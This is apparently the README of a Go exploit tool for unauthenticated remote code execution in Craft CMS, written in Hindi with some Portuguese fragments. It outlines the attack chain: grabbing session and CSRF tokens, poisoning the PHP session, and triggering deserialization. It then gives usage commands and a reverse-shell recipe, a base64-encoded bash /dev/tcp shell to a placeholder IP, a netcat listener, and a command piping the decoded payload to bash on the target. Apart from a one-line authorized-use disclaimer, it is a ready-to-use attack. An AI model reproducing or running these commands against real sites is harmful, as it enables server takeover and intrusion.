
Go में Craft CMS के लिए बिना प्रमाणीकरण वाला RCE एक्सप्लॉइट। सत्र/CSRF टोकन प्राप्त करता है, PHP सत्र को पॉइज़न करता है, और कमांड निष्पादन या रिवर्स शेल के लिए डिसीरियलाइज़ेशन ट्रिगर करता है।
Craft CMS में बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) के लिए एक्सप्लॉइट, Go में लिखा गया।
c0gnit00 के मूल कार्य से प्रेरित।
GET /admin/login के माध्यम से PHP सेशन और CSRF टोकन प्राप्त करता हैassets/generate-transform के माध्यम से डिसीरियलाइज़ेशन ट्रिगर करता हैgo run main.go -u <url> -c <comando>
| Flag | विवरण | अनिवार्य |
|---|---|---|
-u | लक्ष्य URL (उदा: http://target.com) | हाँ |
-c | निष्पादित करने के लिए कमांड (उदा: id, whoami) | हाँ |
# Sem Asset ID (brute-force automático)
go run main.go -u http://target.com -c whoami
1. अपने IP और पोर्ट के साथ base64 में पेलोड जनरेट करें:
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64
2. लिसनर खोलें:
nc -lvnp 4444
3. पेलोड के साथ एक्सप्लॉइट चलाएँ:
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"
चरण 1 में अपने वास्तविक IP के साथ जनरेट किए गए base64 मान से बदलें।
केवल अधिकृत वातावरण और नियंत्रित सुरक्षा परीक्षणों में उपयोग के लिए।